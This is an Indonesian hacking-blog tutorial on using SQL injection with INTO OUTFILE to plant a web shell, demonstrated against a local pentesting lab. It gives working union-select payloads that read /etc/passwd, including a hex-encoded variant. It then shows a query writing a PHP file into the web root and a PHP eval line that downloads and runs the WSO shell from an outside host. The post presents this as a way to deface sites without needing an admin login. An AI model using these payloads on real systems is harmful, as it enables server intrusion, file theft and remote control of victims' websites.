Upload Shell With SQL Injection ( SQL Into OUTFILE)

Author : UnknownTidak ada komentar

Family Attack Cyber

Upload Shell With SQL Injection ( SQL Injection Into OUTFILE)

SQL Injection Into OUTFILE Upload shell tanpa mencari login admin...

sempat" menulis lagi di blog hehehe dari pada bosen gak ngapain" mending buat tutor ... sudah jarang masuk di dunia hacking karena sibuk di dunia nyata...

tapi insyaallah saya akan sempat share tutor ...

*Pastikan kalian sudah mengerti deface sql manual kalo belum lihat post sebelumnya

Deface SQL Manual

ohh ya jika kalian butuh tools" kunjungin juga blog pencari receh :'v 

404Hacking

TOols


 kali ini saya pakai bts pentesting lab, karena males cari live target 




SS1

pastikan kalian sudah di posisi seperti ini lalu di angka 3 ganti dengan load_file('/etc/passwd') , localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,load_file('/etc/passwd'),4--+
HEX : load_file(0x2f6574632f706173737764)
jika tidak keluar isi dalam perutnya skip aja bro tapi kalau mau tahu isi usernya bisa lihat di target,com/phpinfo.php
karena gw pakai web kaya gini gak bakal keluar lah ya kampang :'v

lalu sekarang untuk mengupload shellnya jika sudah ketemu user langsung go aja keburu kuota gw habis ye
localhost:8080/btslab/vulnerability/ForumPosts.php?id=-1 union select 1,2,'Daffa Haxor',4 into outfile 'D:/USBWebserver v8.6/root/btslab/vulnerability/uploads/daffahaxor.php'--+


SS2




 kalo seperti berhasil ya fans... sekarang kita coba buka daffahaxor.php &.... 


SS3

sekarang saya pakai teknik memanggil script & kode seperti ini 

<?php eval("?>".file_get_contents("http://www.w0rms.com/down/wso.txt"));?>
lalu result seperti ini 


SS4

terimah kasih sudah melihat tutor jika ada yang bingung tanya ke FB Daffa Haxor klo gak di bales ya lu chat aja ke fanspage :'v

Artikel Terkait

Posted On : Sabtu, 11 November 2017Time : November 11, 2017
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : Tutorial Hacker | |
close
Banner iklan disini
> [Tutup]